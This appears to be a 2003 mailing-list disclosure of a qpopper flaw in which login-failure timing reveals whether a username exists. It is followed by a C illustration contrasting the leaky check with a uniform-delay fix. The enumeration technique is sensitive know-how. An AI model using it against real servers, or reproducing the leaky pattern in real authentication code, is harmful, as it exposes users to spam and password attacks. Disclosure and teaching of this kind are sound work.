Date: Sat, 15 Mar 2003 20:13:43 +0100
From: Dennis Lubert <[email protected]>
To: [email protected]
Subject: qpopper timing analysis to determine if a username exists on a system
Hello,
During development of a pop3 tool I found an issue that makes it possible
for any user to check the validity of a user on a target system. If a user
is valid and an invalid password has been supplied, then the system waits
~10 seconds until it sends a disconnect message and disconnects. If the
username was not correct, then it disconnects immediately after the wrong
password.
This makes it possible to scan a server for valid users, to generate spam
sending lists, or to check a username for another kind of attack.
Tested against qpopper 3.1 and 4.0.4, others might be affected as well.
Attached is the source code for a program that will do a simple check on a
pop3 server. Additionally qpopper will also return an answer if the
username supplied has a UID < 100 (< 10 for 3.1), which will also be checked.
The fix should be simple, there must be a usleep() call or similar that
should either be deleted, or added also to the part where the username was
not correct.
greets
Dennis
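As an added illustration (not the attached poptest.cpp and not qpopper's code), a simulated POP3 password check showing the leaky pattern the report describes beside the uniform-delay fix it proposes. The user table and the delay value are constructed; the delay is returned rather than slept so the two variants can be compared without waiting.

```c
#include <stdio.h>
#include <string.h>

/* Constructed stand-in for the system user database (not qpopper's code). */
struct user { const char *name; const char *password; };
static const struct user USERS[] = { { "alice", "s3cret" }, { "bob", "hunter2" } };
#define NUSERS (sizeof USERS / sizeof USERS[0])
#define FAIL_DELAY_US 10000000L   /* the ~10 s pause the report observed */

static const struct user *lookup(const char *name)
{
    for (size_t i = 0; i < NUSERS; i++)
        if (strcmp(USERS[i].name, name) == 0)
            return &USERS[i];
    return NULL;
}

/* Leaky pattern: the delay runs only after the user was found, so an unknown
 * name is rejected instantly while a known name with a bad password waits ~10 s.
 * Returns 1 on success, 0 on failure; *delay_us is what the server would
 * usleep() before disconnecting (returned rather than slept, so it can be checked). */
int auth_leaky(const char *name, const char *pw, long *delay_us)
{
    const struct user *u = lookup(name);
    if (u == NULL) { *delay_us = 0; return 0; }
    if (strcmp(u->password, pw) != 0) { *delay_us = FAIL_DELAY_US; return 0; }
    *delay_us = 0;
    return 1;
}

/* Fixed pattern: both failure cases take the same path and the same delay, and
 * the password is compared against a dummy record when the name is unknown, so
 * the time to disconnect no longer depends on whether the user exists. */
int auth_uniform(const char *name, const char *pw, long *delay_us)
{
    static const struct user dummy = { "", "" };
    const struct user *u = lookup(name);
    const struct user *cmp = (u != NULL) ? u : &dummy;
    int pw_ok = (strcmp(cmp->password, pw) == 0);   /* always runs, known or not */
    int ok = (u != NULL) && pw_ok;
    *delay_us = ok ? 0 : FAIL_DELAY_US;   /* identical for unknown user and wrong password */
    return ok;
}

int main(void)
{
    long dl, du;
    auth_leaky("mallory", "wrong", &dl);    /* unknown name: 0 us, the tell */
    auth_uniform("mallory", "wrong", &du);  /* unknown name: full delay */
    printf("leaky=%ld us  uniform=%ld us\n", dl, du);
    return 0;
}
```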